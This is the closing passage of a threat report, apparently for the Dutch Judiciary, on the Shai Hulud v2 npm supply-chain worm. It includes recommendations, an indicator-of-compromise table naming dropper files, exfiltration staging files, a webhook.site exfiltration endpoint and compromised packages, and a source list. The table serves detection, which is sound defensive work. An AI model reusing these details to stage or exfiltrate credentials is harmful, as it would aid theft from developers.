The Shai Hulud campaign demonstrates that the NPM ecosystem is being weaponized with increasing sophistication, moving from simple theft to automated destruction. For the Dutch Judiciary, the combination of data exfiltration and destructive capabilities necessitates a shift from reactive patching to proactive supply chain defense. By implementing strict egress controls, adopting OIDC for identity-based access, and adhering to the NIS2 reporting framework, the organization can contain this threat and build resilience against the next generation of supply chain worms. The immediate priority is the safe containment of any infected nodes to prevent data destruction, followed by a rigorous audit of credentials and dependencies.
Appendix A: IoC Database
The following indicators of compromise are associated with the Shai Hulud v2 campaign [2].
| Indicator Type | Value / Pattern | Description |
| --- | --- | --- |
| File Hash (SHA256) | a3894003ad1d293ba96d77881ccd2071446dc3f65f434669b49b3da92421901a | setup_bun.js (Dropper) |
| File Hash (SHA1) | d60ec97eea19fffb4809bc35b91033b52490ca11 | bun_environment.js (Payload) |
| File Name | setup_bun.js, bun_environment.js | Malicious scripts found in package root |
| File Name | truffleSecrets.json, cloud.json, environment.json, contents.json | Staging files for exfiltrated data |
| Network Domain | webhook.site | C2 / Exfiltration Endpoint |
| Network Domain | bun.sh | Unauthorized download of Bun runtime |
| GitHub Repo | Description: “Sha1-Hulud: The Second Coming” | Repositories created by malware |
| GitHub Runner | Name: SHA1HULUD | Malicious self-hosted runner |
| Package Name | @ctrl/tinycolor | Versions 4.1.1, 4.1.2 (Compromised) |
| Package Name | ngx-bootstrap | Compromised versions (check specific advisories) |
| Package Name | @asyncapi/specs | Compromised versions (check specific advisories) |
Works cited
1. Shai-hulud 2.0 Campaign Targets Cloud and Developer Ecosystems | Trend Micro (US), accessed November 28, 2025, https://www.trendmicro.com/en_us/research/25/k/shai-hulud-2-0-targets-cloud-and-developer-systems.html
2. Shai-Hulud 2.0 Supply Chain Attack: 25K+ Repos Exposing Secrets – Wiz, accessed November 28, 2025, https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack
3. GitLab discovers widespread npm supply chain attack, accessed November 28, 2025, https://about.gitlab.com/blog/gitlab-discovers-widespread-npm-supply-chain-attack/
4. Second Sha1-Hulud Wave Affects 25,000+ Repositories via npm Preinstall Credential Theft, accessed November 28, 2025, https://thehackernews.com/2025/11/second-sha1-hulud-wave-affects-25000.html
5. Shai-Hulud worm infects npm packages – Securelist, accessed November 28, 2025, https://securelist.com/shai-hulud-worm-infects-500-npm-packages-in-a-supply-chain-attack/117547/
6. Shai-Hulud: Self-Replicating Worm Compromises 500+ NPM Packages – StepSecurity, accessed November 28, 2025, https://www.stepsecurity.io/blog/ctrl-tinycolor-and-40-npm-packages-compromised
7. Computer Security Incident Response Teams in the reformed Network and Information Security Directive: good practices, accessed November 28, 2025, https://www.ncsc.nl/binaries/ncsc/documenten/publicaties/2022/oktober/13/index/NCSC_NIS2_D1_Final.pdf
8. Report an incident | Contact | National Cyber Security Centre, accessed November 28, 2025, https://english.ncsc.nl/contact/contact-forms/incident-registration
9. The Second Coming of Shai-Hulud: npm Targeted Yet Again – Orca Security, accessed November 28, 2025, https://orca.security/resources/blog/shai-hulud-npm-malware-wave-2/
10. “Shai-Hulud” Worm Compromises npm Ecosystem in Supply Chain Attack (Updated November 26) – Unit 42, accessed November 28, 2025, https://unit42.paloaltonetworks.com/npm-supply-chain-attack/
11. Return of the Shai-Hulud worm affects over 25,000 GitHub repositories – Sysdig, accessed November 28, 2025, https://www.sysdig.com/blog/return-of-the-shai-hulud-worm-affects-over-25-000-github-repositories
12. Shai-Hulud 2 Malware Campaign Targets GitHub and Cloud Credentials Using Bun Runtime | Blog | Endor Labs, accessed November 28, 2025, https://www.endorlabs.com/learn/shai-hulud-2-malware-campaign-targets-github-and-cloud-credentials-using-bun-runtime
13. Sha1-Hulud: The Second Coming – Zapier, ENS Domains, and Other Prominent NPM Packages Compromised – StepSecurity, accessed November 28, 2025, https://www.stepsecurity.io/blog/sha1-hulud-the-second-coming-zapier-ens-domains-and-other-prominent-npm-packages-compromised
14. The Shai-Hulud 2.0 npm worm: analysis, and what you need to know, accessed November 28, 2025, https://securitylabs.datadoghq.com/articles/shai-hulud-2.0-npm-worm/
15. Shai-Hulud 2.0: Aggressive & Automated, One Of Fastest Spreading NPM Supply Chain Attacks Ever Observed – Netskope, accessed November 28, 2025, https://www.netskope.com/blog/shai-hulud-2-0-aggressive-automated-one-of-fastest-spreading-npm-supply-chain-attacks-ever-observed
16. Shai-hulud 2.0 Campaign Targets Cloud and Developer Ecosystems, accessed November 28, 2025, https://www.trendmicro.com/pt_br/research/25/k/shai-hulud-2-0-targets-cloud-and-developer-systems.html
17. Responding to npm package compromise by the Shai-Hulud worm. – Kaspersky, accessed November 28, 2025, https://www.kaspersky.com/blog/tinycolor-shai-hulud-supply-chain-attack/54315/
18. Shai-Hulud, The Second Coming – Ongoing npm supply chain attack – JFrog Security Research, accessed November 28, 2025, https://research.jfrog.com/post/shai-hulud-the-second-coming/
19. Shai-Hulud npm supply chain attack: What you need to know | ReversingLabs, accessed November 28, 2025, https://www.reversinglabs.com/blog/shai-hulud-worm-npm
20. Shai-Hulud 2.0: How Cortex Detects and Blocks the Resurgent npm Worm – Palo Alto Networks Blog, accessed November 28, 2025, https://www.paloaltonetworks.com/blog/cloud-security/shai-hulud-2-0-npm-worm-detection-blocking/
21. The relationship between the mandatory reporting obligations of NIS2 and GDPR in light of premature public disclosure, accessed November 28, 2025, http://arno.uvt.nl/show.cgi?fid=163379
22. The NIS2 directive – Deloitte, accessed November 28, 2025, https://www.deloitte.com/nl/en/services/consulting-risk/perspectives/the-nis2-directive.html
-
NIS2 Directive Compliance Guide: Essential Requirements 2025 – ATLAS Advisory, geopend op november 28, 2025, https://atlas-advisory.eu/insights/nis2-directive-compliance-guide
-
What is NIS2? Everything Your Business Needs to Know – NISTRA, geopend op november 28, 2025, https://getnistra.com/what-is-nis2-everything-your-business-needs-to-know/
-
Baseline information security for government 2, BIO2 – bio-overheid, geopend op november 28, 2025, https://www.bio-overheid.nl/media/jcdfql4p/20250924-baseline-information-security-for-government-2-bio2-v12-final.pdf
-
Widespread Supply Chain Compromise Impacting npm Ecosystem – CISA, geopend op november 28, 2025, https://www.cisa.gov/news-events/alerts/2025/09/23/widespread-supply-chain-compromise-impacting-npm-ecosystem
-
Shai-Hulud 2.0 Deep Dive and Actionable Steps You Should Take | Cycode, geopend op november 28, 2025, https://cycode.com/blog/shai-hulud-2-0-deep-dive-and-actionable-steps-you-should-take/
-
Navigating the Shai-Hulud worm: Elastic’s proactive defense against npm supply chain compromise, geopend op november 28, 2025, https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise
-
Shai Hulud 2.0 Strikes Again: Malware Supply-Chain Attack Hits Zapier & ENS Domains, geopend op november 28, 2025, https://www.aikido.dev/blog/shai-hulud-strikes-again-hitting-zapier-ensdomains
-
CONTAIN, ROTATE, RECOVER: The 5-Phase Shai-Hulud Response Guide, geopend op november 28, 2025, https://research.jfrog.com/post/shai-hulud-the-second-coming-remediation-guidance/
-
Strengthening npm security: Important changes to authentication and token management, geopend op november 28, 2025, https://github.blog/changelog/2025-09-29-strengthening-npm-security-important-changes-to-authentication-and-token-management/
-
Security Insights – DevCentral – F5, geopend op november 28, 2025, https://community.f5.com/category/articles/kb/security-insights
-
Sandworm in the supply chain: Lessons from the Shai-Hulud npm attack on developer and machine identities – CyberArk, geopend op november 28, 2025, https://www.cyberark.com/resources/blog/sandworm-in-the-supply-chain-lessons-from-the-shai-hulud-npm-attack-on-developer-and-machine-identities
-
OpenID Connect – GitHub Docs, geopend op november 28, 2025, https://docs.github.com/en/actions/concepts/security/openid-connect
-
Security Lessons For All From GitHub’s Hardened Package Publication For npm, geopend op november 28, 2025, https://blog.gitguardian.com/security-lessons-npm-publishing/
-
When the Shai-Hulud Worm Awakens: Tinycolor’s Fall and the New Era of Supply Chain Risk – Black Kite, geopend op november 28, 2025, https://blackkite.com/blog/when-the-shai-hulud-worm-awakens-tinycolors-fall-and-the-new-era-of-supply-chain-risk
-
Data Platform as Product, https://drive.google.com/open?id=1uGxC5f5AYCxwbjW9kFHt5ubnbIR4hjxXozIdltoDySg
-
shai-hulud-2-packages.csv – wiz-sec-public/wiz-research-iocs – GitHub, geopend op november 28, 2025, https://github.com/wiz-sec-public/wiz-research-iocs/blob/main/reports/shai-hulud-2-packages.csv